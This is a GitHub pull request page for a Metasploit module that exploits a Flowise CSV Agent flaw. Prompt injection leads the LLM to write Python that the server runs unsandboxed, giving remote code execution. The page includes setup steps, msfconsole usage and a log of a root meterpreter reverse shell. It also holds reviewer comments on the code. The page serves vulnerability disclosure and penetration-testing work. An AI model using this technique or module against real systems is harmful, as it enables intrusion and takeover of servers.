Skip to content

Add Flowise CSV Agent Prompt Injection RCE module (CVE-2026-41264)#21407

Open
Takahiro-Yoko wants to merge 5 commits into
rapid7:masterfrom
Takahiro-Yoko:flowise_auth_rce_cve_2026_41264
Open

Add Flowise CSV Agent Prompt Injection RCE module (CVE-2026-41264)#21407
Takahiro-Yoko wants to merge 5 commits into
rapid7:masterfrom
Takahiro-Yoko:flowise_auth_rce_cve_2026_41264

Conversation

@Takahiro-Yoko
Copy link
Copy Markdown
Contributor

@Takahiro-Yoko Takahiro-Yoko commented May 5, 2026

CVE-2026-41264
GHSA-3hjv-c53m-58jj

Vulnerable Application

This vulnerability allows remote attackers to execute arbitrary code on affected installations of FlowiseAI Flowise.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within the run method of the CSV_Agents class.
The issue results from the lack of proper sandboxing when evaluating an LLM generated python script.
An attacker can leverage this vulnerability to execute code in the context of the user running the server.

The vulnerability affects:

*  flowise <= 3.0.13
*  flowise-components <= 3.0.13

This module was successfully tested on:

* flowise 3.0.13 installed with Docker

Installation

  1. docker run --name flowise -p 3000:3000 flowiseai/flowise:3.0.13

  2. On an attacker machine

curl -fsSL https://ollama.com/install.sh | sh
ollama run llama3.1
  1. Create API Key (need chatflows:create permission for exploit to work)
image

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/flowise_auth_rce_cve_2026_41264.rb
  4. Do: run lhost=<lhost> rhost=<rhost> apikey=<apikey> ollamaapiuri=<ollamaapiuri> model=<model>
  5. You should get a meterpreter

Scenarios

cmd/linux/http/x64/meterpreter_reverse_tcp

msf > use exploit/multi/http/flowise_auth_rce_cve_2026_41264.rb
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(multi/http/flowise_auth_rce_cve_2026_41264) > run apikey=<apikey> rhost=192.168.56.17 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434  model=llama3.1
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Flowise version 3.0.13 detected
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:33468) at 2026-05-05 14:09:24 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : acc229b14e46
OS           :  (Linux 6.8.0-52-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@msutovsky-r7 msutovsky-r7 self-assigned this May 11, 2026
msutovsky-r7
msutovsky-r7 reviewed May 26, 2026
View reviewed changes
Comment thread modules/exploits/multi/http/flowise_auth_rce_cve_2026_41264.rb Outdated
Comment thread modules/exploits/multi/http/flowise_auth_rce_cve_2026_41264.rb Outdated
Comment thread modules/exploits/multi/http/flowise_auth_rce_cve_2026_41264.rb Outdated
version = flowise_get_version
return CheckCode::Unknown('Could not retrieve Flowise version.') unless version

return CheckCode::Appears("Flowise version #{version} detected") if version <= Rex::Version.new('3.0.13')
Copy link
Copy Markdown
Contributor

@msutovsky-r7 msutovsky-r7 May 26, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is there a lower bound?

Copy link
Copy Markdown
Contributor Author

@Takahiro-Yoko Takahiro-Yoko May 27, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks! Although this has not been explicitly tested (yet), there appears to be no lower bound.

Copy link
Copy Markdown
Contributor Author

@Takahiro-Yoko Takahiro-Yoko May 30, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It seems that the CSV Agent was first introduced in Flowise version 1.3.0, so the theoretical lower bound is 1.3.0.
Updated. dc9dd26 Thanks!

image

history

image

commit

Comment thread modules/exploits/multi/http/flowise_auth_rce_cve_2026_41264.rb
fail_with(Failure::Unknown, 'Failed to create a chatflow.') unless res.code == 200
@id = res.get_json_document['id']

send_request_cgi({
Copy link
Copy Markdown
Contributor

@msutovsky-r7 msutovsky-r7 May 26, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Do we need to check the response here?

Copy link
Copy Markdown
Contributor Author

@Takahiro-Yoko Takahiro-Yoko May 27, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks! Updated. 8f03671

Takahiro-Yoko and others added 3 commits May 27, 2026 06:39
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@msutovsky-r7 msutovsky-r7 msutovsky-r7 left review comments

At least 1 approving review is required to merge this pull request.

Assignees

@msutovsky-r7 msutovsky-r7

Labels

docs module

Projects

Metasploit Kanban
Status: Todo

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@Takahiro-Yoko @msutovsky-r7 @smcintyre-r7